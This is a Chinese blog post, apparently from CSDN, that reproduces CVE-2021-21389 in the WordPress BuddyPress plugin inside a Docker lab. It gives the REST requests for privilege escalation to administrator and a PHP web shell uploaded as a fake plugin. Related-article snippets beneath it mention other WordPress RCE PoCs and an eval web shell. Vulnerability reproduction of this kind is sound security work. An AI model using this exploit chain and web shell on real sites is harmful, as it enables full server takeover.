WordPress BuddyPress 存在越权漏洞RCE(CVE-2021-21389)

最新推荐文章于 2024-02-24 19:09:32 发布
最新推荐文章于 2024-02-24 19:09:32 发布
阅读量3k 收藏 8
点赞数 2
文章标签: 安全 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124704353
版权

一、漏洞描述

BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题

二、影响版本

5.0.0 <BuddyPress< 7.2.1

三、漏洞环境

1、dockerhub拉镜像,docker pull hoangkien1020/buddypress:cve202121389

2、启动环境,docker run -p 80:80 -d hoangkien1020/buddypress:cve202121389

四、漏洞复现

1、构造发包:POST /wp-json/buddypress/v1/signup

{"user_login": "test1121", "user_email": "qxzkpzc@test.com", "user_name": "test1121", "password": "test1121"}

2、将注册时的activation_key取出来,构造发包PUT //wp-json/buddypress/v1/signup/activate/cPyemIPO4HhzOaPpJtA9oG1MUlxULeiM,以绕过邮箱验证

3、新建分组,填完Details后,然后settings默认点击下一步,然后重新进入groups,已经创建成功。

4、点开group1134进入manage下面的members,点击Ban,然后抓包,获取到有效的Cookie和X-WP-Nonce,然后构造发包POST /wp-json/buddypress/v1/members/me,替换掉里面的Cookie和X-WP-Nonce,然后获取administrator角色的权限

{"roles": "administrator"}

刷新页面后,我们已经获取到administrator角色的权限可以查看和操作所有模块,我们通过更新plugins,上传木马

选择文件时,选择所有文件,保险起见选择啦.png格式的小马(后测试发现可以直接上传.php文件),测试一下选择上传后,抓包修改,修改为.php模式,

Content-Disposition: form-data; name="pluginzip"; filename="c.php"

Content-Type: text/php

<?php

system($_GET[cmd]);

?>

上传成功后,status显示为200,但是显示不可更新,我们从/wp-content/uploads/2022/05/(上传的年月)路径下获取已经上传的木马文件,成功执行命令

五、更新建议

目前厂商已发布升级补丁以修复漏洞或直接更新到最新版本,补丁获取链接:

BuddyPress 7.2.1 Security Release · BuddyPress.org

whatever`
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为它并没有很好地解释漏洞(我认为),所以我决定根据系统信息的易受攻击的版本来编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yours
web应用常见漏洞
qq_43590351的博客
09-11 770
web应用常见漏洞 <span style="color:red;">红色</span> 学习目标 章节 学习目标 ThinkPHP 远程代码执行 掌握 Think php框架 V2.x (和V5.0.20) 远程代码执行漏洞利用方式 Stuts2 代码执行漏洞 掌握 Stuts2 (CVE-2019-0230) 远程代码执行漏洞的利用方式 Shiro
WordPress 4.7.0及4.7.1存在越权漏洞 官方已出补丁 站长们尽快备份后升级吧
weixin_34097242的博客
09-01 352
WordPress 4.7.0-4.7.1版本中,存在着一个越权漏洞,成功的利用这个漏洞,可以绕过管理员权限对文章进行增删改查操作。官方已经发布补丁,请广大站长朋友们尽快备份后升级。 WordPress 4.7.1越权漏洞 WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把...
WordPress爆炸性0day,直接RCE!附POC
最新发布
m0_52514790的博客
02-24 812
2.漏洞路径为:/wp-json/bricks/v1/render_element,然后使用构造好的POC进行nonce的替换,直接进行命令执行,获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站,然后右键查看网页源代码或者使用抓包工具抓取返回的数据包,直接搜索参数nonce,获取其参数值。
渗透测试报告中的那些名词解释
weixin_30502157的博客
10-27 482
一、说明 在阅读安全相关的一些文章时经常出现一些名词,其概念或之间的关系经常觉得含混不清,探究了一番记下来备忘,也希望能有助于各位看官。 二、CVE及其相关 2.1 CVE(Common Vulnerabilities and Exposures,公共漏洞展示) 网址:http://cve.mitre.org/ 创立日期:1999 创立原因:最初不同安全工具和数据库对...
wordpress 漏洞与提权(一)
公众号
08-27 3992
WordPress核心功能SQL注入漏洞分析 本文属于转载---╮(╯▽╰)╭  绿盟科技 威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问
wordpress php执行短代码_【漏洞预警】WordPress 5.0.0远程代码执行漏洞
weixin_39854951的博客
12-12 168
在2019年2月19日,国外安全人员在博客中的披露了一则Wordpress 5.0.0版本远程代码执行漏洞。该漏洞本质上是由一个目录遍历漏洞以及一个本地文件包含漏洞组合利用而导致的一个远程代码执行漏洞。当攻击者获取到WordPress站点具有一定访问权限的账户后,即可利用该漏洞在底层服务器上执行任意PHP代码,从而实现完全远程接管服务器的目的。深信服安全团队第一时间响应并发布预警信息,并...
WordPress BuddyPress 越权RCE漏洞复现(CVE-2021-21389
0xSec
01-13 1412
BuddyPressWordPress母公司的一个全新的开源程序,BuddyPress 从本质上说其实是 WordPress 的插件。BuddyPressWordPress的关注点从博客转移到了社区。当然,用户还是能够使用WordPress的所有的博客功能,只是当用户使用 BuddyPress 时,第一要做的是创建他们个人档案,第二才是写博客。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5222
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
备份插件存在严重RCE漏洞,可导致WordPress网站遭接管
smellycat000的专栏
12-13 160
聚焦源代码安全,网罗国内外最新资讯!作者:Elizabeth Montalbano编译:代码卫士WordPress 备份插件 Backup Migration 的下载次数已超过9万次,其中存在一个严重的RCE漏洞,可导致易受攻击的 WordPress 网站遭接管。这是又一起因建站平台插件漏洞造成的风险事件。Nex Team 在 Backup Migration 插件中发现了一个 PHP 代码注入...
漏洞分析】WordPress REST API 内容注入漏洞分析
Anprou的博客
02-08 4001
WordPress更新到最新版本。
WordPress-RCE-EXP
04-10
WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --
buddypress-docs-tree:Wordpress Buddypress插件
05-23
Buddypress Docs树状视图小部件Wordpress Buddypress插件:将jstree小部件添加到BuddyPress-Docs组件buddypress-docs-tree 贡献者:Johappel 标签:buddypress,bp-docs,buddypress文档至少需要:4.0 经过测试:...
buddypress-last-active-users-wp-admin:在“wp-adminusers.php”页面上显示用户的 BuddyPress 上次活动日期
07-03
BuddyPress 最后活跃用户 (wp-admin) 在wp-admin/users.php页面上显示用户的 BuddyPress 上次活动日期
wp-cli-buddypress:BuddyPress命令的WP-CLI社区软件包
05-15
buddypress / wp-cli-buddypress 通过命令行管理BuddyPress。 快速链接:|正在安装wp-cli-buddypress默认情况下与BuddyPress一起安装。 因此,如果您需要使用最新版本,请运行: wp package install git@github....
buddypress-admin-edit-profile-link:从WordPress用户仪表板编辑BuddyPress用户配置文件
05-26
BuddyPress-用户个人资料编辑管理员链接 #### BuddyPress插件 一个非常简单,很小的WordPress BuddyPress插件,可在WordPress用户管理仪表板页面中列出的指向该用户BuddyPress配置文件编辑页面的每个用户旁边提供...
cache-buddy:#WordPressPlugin:使更多WordPress页面可缓存
02-05
缓存伙伴贡献者:markjaquith 捐赠链接: : 标签:缓存,缓存,速度,性能,更快至少需要:4.1 经过测试:4.2 稳定标签:0.2.0 许可证:GPLv2或更高版本许可URI: : 最小化已登录用户显示为已登录WordPress的情况,...
Web漏洞-未授权访问漏洞
Ays.Ie的博客
03-21 3349
该篇记录了web漏洞-未授权访问漏洞的相关知识
wordpress搭建论坛
09-27
要在WordPress上搭建一个论坛,你可以使用插件来实现。以下是基本步骤: 1. 安装WordPress:首先,确保你已经安装了WordPress。你可以从官方网站 https://wordpress.org 下载最新版本,并按照说明进行安装。 2. 选择一个论坛插件:WordPress有很多论坛插件可供选择。其中一些流行的插件包括bbPressBuddyPress和Simple:Press。你可以在WordPress插件目录中搜索并安装适合你的插件。 3. 安装并激活插件:进入WordPress后台管理界面,导航到“插件”>“安装插件”,然后搜索你选择的论坛插件。找到对应的插件后,点击“安装”按钮进行安装,然后再点击“激活”按钮启用插件。 4. 配置论坛:每个论坛插件都有自己的配置选项,可以根据你的需求进行设置。通常,你需要设置论坛的外观、用户权限、帖子和回复的显示方式等。 5. 创建论坛页面:一旦插件配置完成,你需要创建一个用于显示论坛的页面。通常插件会自动生成一个默认页面,你可以在“页面”>“添加新页面”中查找并编辑该页面。在编辑页面时,可以使用短代码或页面构建器来插入论坛组件。 6. 设置访问权限:如果需要限制访问论坛的权限,可以使用插件提供的用户角色和权限控制功能。这样可以确保只有授权用户才能访问和参与讨论。 7. 发布并测试论坛:完成以上步骤后,点击“发布”按钮将论坛页面发布到前台。然后,你可以访问你的网站,并测试论坛的功能、用户注册、发表帖子和回复等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值